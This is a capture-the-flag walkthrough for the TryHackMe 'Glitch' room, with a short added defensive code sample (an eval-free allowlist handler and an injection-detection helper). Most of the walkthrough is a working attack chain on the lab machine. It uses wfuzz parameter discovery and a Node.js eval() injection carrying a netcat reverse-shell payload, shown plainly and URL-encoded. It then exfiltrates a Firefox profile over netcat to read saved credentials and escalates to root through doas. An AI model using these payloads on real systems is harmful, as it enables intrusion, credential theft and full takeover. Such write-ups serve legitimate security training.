TryHackMe solution: GLITCH

Link: https://tryhackme.com/room/glitch

#1 "What is your access token?"

Use:

nmap -sCV 10.10.108.245

Port 80 is open, so we access: http://10.10.108.245/

Viewing the page source, we find a link:

Access: http://10.10.108.245/api/access

Decode the token with base64 decoder.

#2 "What is the content of user.txt?"

Use gobuster and common.txt.

gobuster -u http://10.10.108.245/api/ -w common.txt

Access: http://10.10.108.245/api/items

Request this link again with the POST method, and we get:

Now, we use Wfuzz and common.txt to find a parameter.

wfuzz -c -z file,common.txt -X POST --hh 45 -u http://10.10.29.82/api/items\?FUZZ\=test

-c : Output with colors
-z payload : Specify a payload for each FUZZ keyword used, in the form name[,parameter][,encoder].
-X method : Specify an HTTP method for the request, e.g. HEAD or FUZZ
--hh N[,N]+ : Hide responses with the specified number of chars (here 45, the size of the unchanged response)
-u url : Specify a URL for the request.

We find 'cmd'; send a POST request to: http://10.10.29.82/api/items?cmd=test

'test' is executed in an eval() function. Stand up a netcat listener on port 1234.

nc -lvnp 1234

Create a reverse shell with the payload:

cmd=require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1234 >/tmp/f')

URL encode:

POST http://10.10.29.82/api/items?%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%36%2e%36%33%2e%31%35%38%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%27%29

And we find the flag.
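The root cause above is user input reaching eval() in a Node.js API. The following is an added example (not the room's code) of the hardened form a developer would ship instead, dispatching the cmd parameter through an allowlist, plus a log-review helper that URL-decodes the raw value before checking for injection markers, since the payload in this room arrives percent-encoded. The item names, command names and marker list are constructed assumptions.

```javascript
// Added example, not the room's application code.
const ITEMS = ['lamp', 'chair', 'desk']; // constructed sample data

// Allowlisted operations keyed by name; each receives only the items array.
const COMMANDS = {
  list:  (items) => items,
  count: (items) => items.length,
};

// Hardened handler: the cmd string is only looked up, never evaluated.
// hasOwnProperty guards against keys like "constructor" or "__proto__".
function handleItemsCommand(cmd) {
  if (typeof cmd !== 'string' ||
      !Object.prototype.hasOwnProperty.call(COMMANDS, cmd)) {
    return { status: 400, body: 'unknown command' };
  }
  return { status: 200, body: COMMANDS[cmd](ITEMS) };
}

// Markers that indicate code is being fed into an eval() sink (assumed list).
const INJECTION_MARKERS = [/require\s*\(/i, /child_process/i, /process\.\w+/i, /\bexec\s*\(/i];

// Log-review helper: decode percent-encoding first, otherwise an encoded
// payload such as %72%65%71... would never match the markers.
function isSuspiciousCmd(rawValue) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawValue);
  } catch (e) {
    // Malformed percent-encoding is itself worth flagging for review.
    return true;
  }
  return INJECTION_MARKERS.some((re) => re.test(decoded));
}
```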

#3 "What is the content of root.txt?"

In /home/user we find a directory named ".firefox".

Let's pull this directory back. On our machine, run:

nc -nlvp 1235 > a.tar

On the target machine, run:

tar -cf a.tar .firefox/
nc 10.6.63.158 1235 < a.tar

After receiving the file, use:

tar xf a.tar

to extract the archive.

Open the saved credentials in our Firefox with:

firefox --profile .firefox/b5w4643p.default-release --allow-downgrade

Spawn a tty shell with:

python -c 'import pty; pty.spawn("/bin/sh");'

and switch to v0id:

su v0id

Use:

find / -perm -u=s -type f 2>/dev/null

We find /usr/local/bin/doas.

Change to root with:

doas -u root /bin/sh

And we have the flag.
